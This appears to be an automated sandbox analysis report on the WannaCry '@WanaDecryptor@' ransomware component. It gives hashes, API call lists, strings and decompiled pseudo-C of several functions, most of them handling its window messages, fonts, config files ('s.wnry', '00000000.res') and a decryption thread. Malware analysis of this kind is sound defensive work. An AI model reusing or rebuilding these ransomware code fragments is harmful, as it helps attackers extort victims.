                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                                      • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
                                                      				struct _IO_FILE* _t24;
                                                      				void* _t30;
                                                      				void* _t37;
                                                      				void* _t38;
                                                      				signed int _t45;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				unsigned int _t53;
                                                      				signed int _t54;
                                                      				void* _t66;
                                                      				struct _IO_FILE* _t76;
                                                      				void* _t77;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t84;
                                                      				void* _t85;
                                                      
                                                      				_t79 = __ecx;
                                                      				 *((char*)(_t81 + 0xc)) = 0;
                                                      				memset(_t81 + 0xd, 0, 0xc << 2);
                                                      				_t82 = _t81 + 0xc;
                                                      				asm("stosb");
                                                      				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                                      				memset(_t82 + 0x44, 0, 0x21 << 2);
                                                      				_t24 = fopen("00000000.res", "rb");
                                                      				_t76 = _t24;
                                                      				_t84 = _t82 + 0x14;
                                                      				_t89 = _t76;
                                                      				if(_t76 != 0) {
                                                      					fread(_t84 + 0x48, 0x88, 1, _t76);
                                                      					fclose(_t76);
                                                      					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                                      					_t45 = _t84 + 0x60;
                                                      					_push(_t84 + 0x2c);
                                                      					_t66 = _t79 + 0x5f0;
                                                      					_push("+++");
                                                      					_push(_t45);
                                                      					_push(_t66);
                                                      					_t30 = E0040C4F0(_t38, _t45, _t89);
                                                      					_t85 = _t84 + 0x30;
                                                      					_t77 = _t30;
                                                      					E0040C670();
                                                      					_t90 = _t77 - 0xffffffff;
                                                      					if(_t77 == 0xffffffff) {
                                                      						_push(_t85 + 0xc);
                                                      						_push("+++");
                                                      						_push(_t85 + 0x40);
                                                      						_push(_t66);
                                                      						_t37 = E0040C4F0(_t38, _t45, _t90);
                                                      						_t85 = _t85 + 0x10;
                                                      						_t77 = _t37;
                                                      					}
                                                      					_t24 = E0040C670();
                                                      					if(_t77 == 1) {
                                                      						_t24 = 0;
                                                      						asm("repne scasb");
                                                      						_t48 =  !(_t45 | 0xffffffff) - 1;
                                                      						if(_t48 >= 0x1e) {
                                                      							asm("repne scasb");
                                                      							_t51 =  !(_t48 | 0xffffffff) - 1;
                                                      							if(_t51 < 0x32) {
                                                      								asm("repne scasb");
                                                      								_t53 =  !(_t51 | 0xffffffff);
                                                      								_t78 = _t85 + 0xc - _t53;
                                                      								_t54 = _t53 >> 2;
                                                      								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                                      								return E00401A10(_t79 + 0x50c, 0);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t24;
                                                      			}






















                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
                                                      				long _t11;
                                                      				void* _t26;
                                                      
                                                      				_t11 = _a4;
                                                      				_t26 = __ecx;
                                                      				if(_t11 != 0x3e9) {
                                                      					L8:
                                                      					L00412CBC();
                                                      					return _t11;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                                      					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                                      					KillTimer( *(_t26 + 0x20), 0x3e9);
                                                      					L00412B66();
                                                      				}
                                                      				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
                                                      				}
                                                      				_t11 =  *(_t26 + 0xa0);
                                                      				if(_t11 == 0) {
                                                      					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                                      					if(_t11 == 0xf) {
                                                      						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                                      					}
                                                      				}
                                                      				goto L8;
                                                      			}






                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
                                                      				int _t6;
                                                      				long _t7;
                                                      				void* _t9;
                                                      				void* _t14;
                                                      
                                                      				_t14 = __ecx;
                                                      				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                                      				_push(0);
                                                      				if(_t6 != 0xffffffff) {
                                                      					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                                      					if(_t7 != 0) {
                                                      						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                                      						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                                      						 *(_t14 + 0xf4) = _t9;
                                                      						return _t9;
                                                      					}
                                                      					return _t7;
                                                      				} else {
                                                      					_push(0);
                                                      					_push("Please select a host to decrypt.");
                                                      					L00412CC8();
                                                      					return _t6;
                                                      				}
                                                      			}








                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
                                                      				struct tagLOGFONTA _v72;
                                                      				long _t10;
                                                      				struct HFONT__* _t13;
                                                      				struct HWND__* _t15;
                                                      				void* _t21;
                                                      
                                                      				_t10 = _a4;
                                                      				_t21 = __ecx;
                                                      				if(_t10 != 0) {
                                                      					L2:
                                                      					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                                      					_v72.lfUnderline = 1;
                                                      					_t13 = CreateFontIndirectA( &_v72);
                                                      					_push(_t13);
                                                      					L00412D5E();
                                                      					 *((char*)(_t21 + 0x58)) = 1;
                                                      					return _t13;
                                                      				}
                                                      				_t15 = GetParent( *(__ecx + 0x20));
                                                      				_push(_t15);
                                                      				L00412DAC();
                                                      				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                                      				_push(_t10);
                                                      				L00412DE2();
                                                      				if(_t10 != 0) {
                                                      					goto L2;
                                                      				}
                                                      				return _t10;
                                                      			}









                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E0040C060(void* __ecx, void* __eflags) {
                                                      				void* _t35;
                                                      				int _t45;
                                                      				struct HWND__* _t56;
                                                      				signed int _t58;
                                                      				int _t59;
                                                      				struct HWND__* _t87;
                                                      				intOrPtr _t92;
                                                      				void* _t93;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142BB);
                                                      				 *[fs:0x0] = _t92;
                                                      				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                                      				_push(_t58);
                                                      				E0040DBB0(_t92 + 0x18, 0x1000);
                                                      				 *(_t92 + 0x241c) = 0;
                                                      				_push(_t92 + 0x14);
                                                      				_t59 = _t58 | 0xffffffff;
                                                      				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                                      				_t93 = _t92 + 0x10;
                                                      				if(_t35 == 0) {
                                                      					_t87 =  *(_t93 + 0x2430);
                                                      					if(_t87 != 0) {
                                                      						SendMessageA(_t87, 0x4e20, 0, 0);
                                                      					}
                                                      					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                                      					_push(0);
                                                      					_push(E0040DD40(_t93 + 0x1c));
                                                      					_push(E0040DD30(_t93 + 0x20));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0, 0);
                                                      						}
                                                      						_push(_t93 + 0x10);
                                                      						_push(_t93 + 0x102c);
                                                      						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                                      						_push(_t93 + 0x17);
                                                      						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
                                                      							if( *((char*)(_t93 + 0xf)) == 7) {
                                                      								_t59 = 0;
                                                      							}
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, _t59, 0);
                                                      							}
                                                      							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							goto L21;
                                                      						} else {
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      						 *(_t93 + 0x241c) = 0xffffffff;
                                                      						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					_t56 =  *(_t93 + 0x2430);
                                                      					if(_t56 != 0) {
                                                      						SendMessageA(_t56, 0x4e20, _t59, 0);
                                                      					}
                                                      					 *(_t93 + 0x241c) = _t59;
                                                      					L21:
                                                      					E0040DBF0(_t93 + 0x14);
                                                      					_t45 = _t59;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                                      				return _t45;
                                                      			}












                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                                      				signed int _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				signed int _t29;
                                                      				intOrPtr _t31;
                                                      				long _t36;
                                                      				intOrPtr _t38;
                                                      				intOrPtr* _t41;
                                                      				struct HWND__* _t47;
                                                      				intOrPtr _t48;
                                                      				long _t53;
                                                      				struct HWND__* _t58;
                                                      				signed int _t60;
                                                      				intOrPtr* _t67;
                                                      				signed int _t68;
                                                      
                                                      				_t67 = __ecx;
                                                      				L00412FE6();
                                                      				_t68 = __eax;
                                                      				if((__eax & 0x00008000) != 0) {
                                                      					_push( &_v8);
                                                      					_push( &_v4);
                                                      					L00412FFE();
                                                      					if(_a4 == 0) {
                                                      						_t60 = _v0;
                                                      						_t41 = _v16;
                                                      					} else {
                                                      						_t58 =  *(__ecx + 0x20);
                                                      						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                                      						_t41 = _v16;
                                                      						_t53 = _t36;
                                                      						if(_t53 == _t41) {
                                                      							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                                      							_t58 =  *(_t67 + 0x6c);
                                                      							if(_t53 - _t38 < _t58) {
                                                      								_t53 = _t58 + _t38;
                                                      							}
                                                      						}
                                                      						asm("cdq");
                                                      						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                                      					}
                                                      					_t47 =  *(_t67 + 0x6c);
                                                      					_t29 = _t47 + _t41;
                                                      					if(_t60 <= _t29) {
                                                      						if(_t60 >= _t41) {
                                                      							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                                      						}
                                                      					} else {
                                                      						_t60 = _t60 + _v12 - _t47 - _t41;
                                                      						if(_t60 > _t29) {
                                                      							_t60 = _t29;
                                                      						}
                                                      						_push(0);
                                                      						if((_t68 & 0x00004000) == 0) {
                                                      							_push(0x4000);
                                                      							_push(0);
                                                      							L00412DDC();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(0x4000);
                                                      							L00412DDC();
                                                      						}
                                                      					}
                                                      					_t48 = _v12;
                                                      					_t31 = _t60 -  *(_t67 + 0x6c);
                                                      					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                                      					if(_t31 < _t48) {
                                                      						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                                      					}
                                                      					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                                      					return 1;
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}


                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v4;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v24;
                                                      				void* __ebx;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t26;
                                                      				intOrPtr* _t33;
                                                      				signed int _t42;
                                                      				unsigned int _t44;
                                                      				signed int _t45;
                                                      				void* _t53;
                                                      				intOrPtr _t65;
                                                      				void* _t67;
                                                      				intOrPtr _t68;
                                                      				void* _t69;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041438B);
                                                      				_t21 =  *[fs:0x0];
                                                      				_push(_t21);
                                                      				 *[fs:0x0] = _t68;
                                                      				_push(__ecx);
                                                      				_push(0x244);
                                                      				L00412CEC();
                                                      				_t33 = _t21;
                                                      				_t69 = _t68 + 4;
                                                      				_v16 = _t33;
                                                      				_t53 = 0;
                                                      				_v4 = 0;
                                                      				if(_t33 == 0) {
                                                      					_t33 = 0;
                                                      				} else {
                                                      					_t65 = _a16;
                                                      					 *_t33 = 0;
                                                      					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                                      					if(_t65 != 0) {
                                                      						asm("repne scasb");
                                                      						_t42 =  !(__ecx | 0xffffffff);
                                                      						_push(_t42);
                                                      						L00412CEC();
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      						asm("repne scasb");
                                                      						_t44 =  !(_t42 | 0xffffffff);
                                                      						_t67 = _t65 - _t44;
                                                      						_t45 = _t44 >> 2;
                                                      						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                                      						_t69 = _t69 + 0x1c;
                                                      						_t53 = 0;
                                                      					}
                                                      				}
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_v4 = 0xffffffff;
                                                      				_t23 = E00411C00(_t33);
                                                      				 *0x4220dc = _t23;
                                                      				if(_t23 == _t53) {
                                                      					_push(8);
                                                      					L00412CEC();
                                                      					 *_t23 = 1;
                                                      					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                                      					 *[fs:0x0] = _v24;
                                                      					return _t23;
                                                      				} else {
                                                      					if(_t33 != _t53) {
                                                      						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                                      						if(_t25 != _t53) {
                                                      							_push(_t25);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                                      						if(_t26 != _t53) {
                                                      							_push(_t26);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_push(_t33);
                                                      						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                                      						L00412C98();
                                                      						_t69 = _t69 + 4;
                                                      					}
                                                      					 *[fs:0x0] = _v24;
                                                      					return 0;
                                                      				}
                                                      			}


                                                      APIs
                                                      • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
